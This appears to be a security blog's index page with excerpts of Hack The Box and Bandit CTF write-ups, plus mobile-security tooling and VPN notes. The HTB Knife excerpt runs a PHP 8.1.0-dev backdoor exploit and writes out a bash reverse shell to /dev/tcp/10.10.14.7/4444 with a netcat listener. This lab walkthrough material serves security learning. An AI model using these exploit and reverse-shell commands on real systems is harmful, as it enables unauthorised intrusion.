Pages

Search

HTB Knife

$ nmap 10.10.10.242 $ nmap 10.10.10.242 -p- -v http://10.10.10.242/ $ whatweb 10.10.10.242 $ searchsploit php 8.1.0-dev $ searchsploit -m php/webapps/49933.py $ python3 49933.py $ id Using this exploit we get a reverse but it is not very useful, we can try to get a better one.https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html $ python3 php_8.1.0-dev_exploit.py -u http://10.10.10.242/ -c «/bin/bash -c ‘/bin/bash -i >& /dev/tcp/10.10.14.7/4444 0>&1′»$ sudo nc -lvnp 4444 james@knife:/$ ls james@knife:/$ cd /homejames@knife:/home$ ls james@knife:/home$

EVABS (Extremely Vulnerable Android Labs)

According to https://github.com/abhi-r3v0/EVABS: An open source Android application that is intentionally vulnerable so as to act as a learning platform for Android application security beginners. The effort is to introduce beginners with very limited or zero knowledge to some of the major and commonly found real-world based Android application vulnerabilities in a story-based, interactive model. EVABS follows a level-wise difficulty approach and in each level, the player learns a new

HTB Cap

$ nmap -A -p- 10.10.10.245 -T4 -Pn Open ports : 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn http://10.10.10.245/ Dashboard Security Snapshot IP Config Network status Security Snapshot http://10.10.10.245/data/1 Using Burp we can discover the content of the site and discover if there is anything else in content data. Using Burp Discover functionality we can obtain also if

Bandit CTF – Level 12

Level 11–>12 bandit11@bandit:~$ ls -la bandit11@bandit:~$ cat data.txt | tr ‘A-Za-z’ ‘N-ZA-Mn-za-m’ password = 5Te8XXXXXXXXXXXXXXXXXXXXXXXXXXXX

HTB Explore

Rustscan is a fast port scanner that promises to scan all 65k ports in 3 seconds.We can use it to perform a full port scan and with the results, we can use them in combination with Nmap.https://github.com/RustScan/RustScan $ rustscan -a 10.10.10.247 $ sudo nmap -sV -sC 10.10.10.247 -p 2222,42135,42507,59777 In the port scan, we found different open ports.As usually, ssh port is not a common port to start testing so,

HTB Scriptkiddie

$ nmap -A -p- 10.10.10.226 -T4 Open ports 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5) Accessing to http://10.10.10.226:5000/ In this site we can observe that nmap and msfvenom are used. $ searchsploit msfvenom From nmap we don’t get too much from searchploit, but from msfvenom we just get 1 result.So it is worth trying. msf6 > search venom

Bandit CTF – Level 11

level 10–>11 bandit10@bandit:~$ ls -la bandit10@bandit:~$ cat data.txt | base64 -d The password is IFukXXXXXXXXXXXXXXXXXXXXXXXXXXXX Password = IFukXXXXXXXXXXXXXXXXXXXXXXXXXXXX

[Solved] Resolv.conf is not updated after an OpenVPN connection

After connecting a VPN on Linux (my case an Ubuntu) that resolv.conf is not updated and you can’t resolve names from that network as expected. After searching a bit I found this website that gave me a solution. You can check in detail here: https://dev.to/setevoy/arch-linux-openvpn–resolvconf-is-not-updated-2470 After connection to the VPN has been performed, we can observe that resolv.conf hasn’t been updated. $ cat /etc/resolv.conf Modify your opvn file and these

Mobile Security Framework (MobSF)

Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. https://github.com/MobSF/Mobile-Security-Framework-MobSF MobSF Documentation: https://mobsf.github.io/docs/#/ Linux requirements: Install Git: sudo apt-get install git Install Python 3.8-3.9: sudo apt-get install python3.8 Install JDK 8+: sudo apt-get install openjdk-8-jdk Install the following dependencies:sudo apt install python3-dev python3-venv python3-pip build-essential libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev wkhtmltopdf For the

Bandit CTF – Level 10

level 9–>10 bandit9@bandit:~$ ls -la bandit9@bandit:~$ strings data.txt | grep «^=» password = truKXXXXXXXXXXXXXXXXXXXXXXXXXXXX